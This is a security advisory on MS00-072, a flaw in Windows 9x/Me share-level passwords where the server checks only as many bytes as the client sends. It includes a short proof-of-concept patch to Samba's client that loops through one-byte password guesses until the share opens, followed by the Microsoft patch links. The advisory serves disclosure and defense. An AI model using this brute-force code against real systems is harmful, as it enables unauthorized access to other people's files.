COMMAND

    Share

SYSTEMS AFFECTED

    Microsoft Windows 95, 98, 98 SE, Me

PROBLEM

    Following is based on  a Microsoft Security Bulletin  MS00-072 and
    it  was  originally  found  by  Nsfocus  Security Team.  Microsoft
    Windows 9x/Me provides a  password protection feature referred  to
    as (share level  access) for the  File and Print  Sharing service.
    However,  due  to  the  way  the  password  feature  is  currently
    implemented, a  file share  could be  compromised, by  a malicious
    user who used a special client utility, without that user  knowing
    the entire password required to access that share.

    Only share level access permissions are vulnerable.  If a  Windows
    9x  or  Windows  Me  machine  were  part  of  a Windows NT domain,
    user-level access controls  could be enforced  on file shares  and
    passwords would  not be  needed to  allow access  to those shares.
    Windows  NT  and  Windows  2000  machines  can  only be setup with
    user-level file share access  controls and are not  susceptible to
    this vulnerability.

    So, You can set password to protect Microsoft Windows 9x  system's
    shared  resources.   But  a  vulnerability  exists in the password
    verification  scheme  utilized  by  Microsoft  Windows  9x NETBIOS
    protocol implementation.   To verify the  password, the length  of
    the password depends  on the length  of the data  sent from client
    to server.  That is, if a client set the length of password to  be
    one byte and  send the packet  with plaintext password  to server,
    the server will only compare it with the first byte of the  shared
    password (plaintext), and  if consistent, verification  process is
    done.  All an  attacker need to do  is to guess and  try the first
    byte of password in the victim.

    Windows  9x  remote  management  system  is also affected cause it
    adopts the same shared password authentication method.

    Here is  one simple  example to  demonstrate this  bug.  Get samba
    source package and modify source/client/client.c like this:

    --- samba-2.0.6.orig/source/client/client.c     Thu Nov 11 10:35:59 1999
    +++ samba-2.0.6/source/client/client.c  Mon Sep 18 21:20:29 2000
    @@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve
    
            DEBUG(4,(" session setup ok\n"));
    
    +/*
            if (!cli_send_tconX(c, share, "?????",
                                password, strlen(password)+1)) {
                    DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
                    cli_shutdown(c);
                    return NULL;
            }
    +*/
    +
    +        password[0] = 0;
    +        c->sec_mode = 0;
    +        do{
    +
    +          password[0]+=1;
    +
    +        }while(!cli_send_tconX(c, share, "?????", password, 1));
    
            DEBUG(4,(" tconx ok\n"));

SOLUTION

    Patch availability:

        - Microsoft Windows 95: Patch available shortly
        - Microsoft Windows 98 and 98 Second Edition: http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE
        - Microsoft Windows Me: http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE

    Workaround is to close Microsoft File and Print shared service.